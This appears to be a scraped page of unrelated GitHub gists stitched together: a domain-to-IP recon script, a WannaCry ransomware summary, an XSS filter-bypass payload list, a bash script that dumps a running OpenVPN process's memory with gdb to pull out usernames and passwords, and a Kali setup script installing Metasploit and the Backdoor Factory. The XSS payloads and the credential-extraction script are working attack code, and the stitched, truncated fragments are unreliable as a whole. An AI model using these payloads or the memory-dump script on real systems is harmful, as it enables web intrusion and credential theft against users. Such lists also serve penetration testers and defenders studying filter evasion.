Skip to content

Instantly share code, notes, and snippets.

@rvrsh3ll
rvrsh3ll / converter.sh
Created May 27, 2018 23:10 — forked from xdavidhu/converter.sh
Converter.sh, a bash script to convert domain lists to resolved IP lists without duplicates
# Converter.sh by @xdavidhu
# This is a script inspired by the Bug Hunter's Methodology 3 by @Jhaddix
# With this script, you can convert domain lists to resolved IP lists without duplicates.
# Usage: ./converter.sh [domain-list-file] [output-file]
echo -e "[+] Converter.sh by @xdavidhu\n"
if [ -z "$1" ] || [ -z "$2" ]; then
echo "[!] Usage: ./converter.sh [domain-list-file] [output-file]"
exit 1
fi

WannaCry|WannaDecrypt0r NSA-Cybereweapon-Powered Ransomware Worm

  • Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
  • Vector: All Windows versions before Windows 10 are vulnerable if not patched for MS-17-010. It uses EternalBlue MS17-010 to propagate.
  • Ransom: between $300 to $600. There is code to 'rm' (delete) files in the virus. Seems to reset if the virus crashes.
  • Backdooring: The worm loops through every RDP session on a system to run the ransomware as that user. It also installs the DOUBLEPULSAR backdoor. (source: malwarebytes)
  • Infections: NHS (uk), Telefonica (spain), FedEx (us), Russia interior ministry & Megafon (russia)
  • Kill switch: If the website www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com is up the virus exits instead of infecting the host. (source: malwarebytes)

SECURITY BULLETIN AND UPDATES HERE: https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

@rvrsh3ll
rvrsh3ll / xxsfilterbypass.lst
Last active March 25, 2024 17:02
XSS Filter Bypass List
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
#!/bin/bash
# This little hack-job will grab credentials from a running openvpn process in Linux
# Keep in mind this won't work if the user used the --auth-nocache flag
pid=$(ps -efww | grep -v grep | grep openvpn | awk '{print $2}')
echo $pid | grep rw-p /proc/$pid/maps | sed -n 's/^\([0-9a-f]*\)-\([0-9a-f]*\) .*$/\1 \2/p' | while read start stop; do gdb --batch-silent --silent --pid $pid -ex "dump memory $pid-$start-$stop.dump 0x$start 0x$stop"; done
echo "Your credentials should be listed below as username/password"
strings *.dump | awk 'NR>=3 && NR<=4 { print }'
rm *.dump --force
@mrhelpmann
mrhelpmann / kali-thpb2.sh
Created September 16, 2015 19:28
I took all the recommended script code and condensed it into this one script. Tested on Kali 2. If you have an issue it is probably on the last few lines around "su - postgres".
service postgresql start
update-rc.d postgresql enable
msfupdate
msfdb init
msfdb start
echo "deb-src http://http.kali.org/kali sana main non-free contrib" >> /etc/apt/sources.list
echo "deb http://http.kali.org/kali sana main non-free contrib" >> /etc/apt/sources.list
apt-get update
apt-get install -y linux-headers-$(uname -r) python-pefile bdfproxy mitmproxy python-openssl openssl subversion python2.7-dev python git gcc make libpcap-dev python-elixir ldap-utils rwho rsh-client x11-apps finger
git clone https://github.com/secretsquirrel/the-backdoor-factory /opt/the-backdoor-factory